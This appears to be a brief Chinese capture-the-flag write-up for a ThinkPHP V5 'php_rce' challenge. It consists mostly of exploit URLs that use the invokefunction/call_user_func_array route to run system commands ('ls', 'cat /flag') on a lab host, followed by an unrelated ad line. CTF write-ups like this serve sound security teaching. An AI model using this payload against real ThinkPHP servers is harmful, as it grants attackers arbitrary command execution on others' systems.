thinkPHP V5 漏洞:Web: php_rce

攻防世界 Web: php_rce

http://220.249.52.133:44797/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
——invokefunction  #调用以下函数
——function=call_user_func_array&vars[0]=system   
——vars[1][]  #使用Linux命令


http://220.249.52.133:44797/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /flag



cat /flag
# 查看找到flag
http://220.249.52.133:44797/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag
【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/jiangyatao/p/13409752.html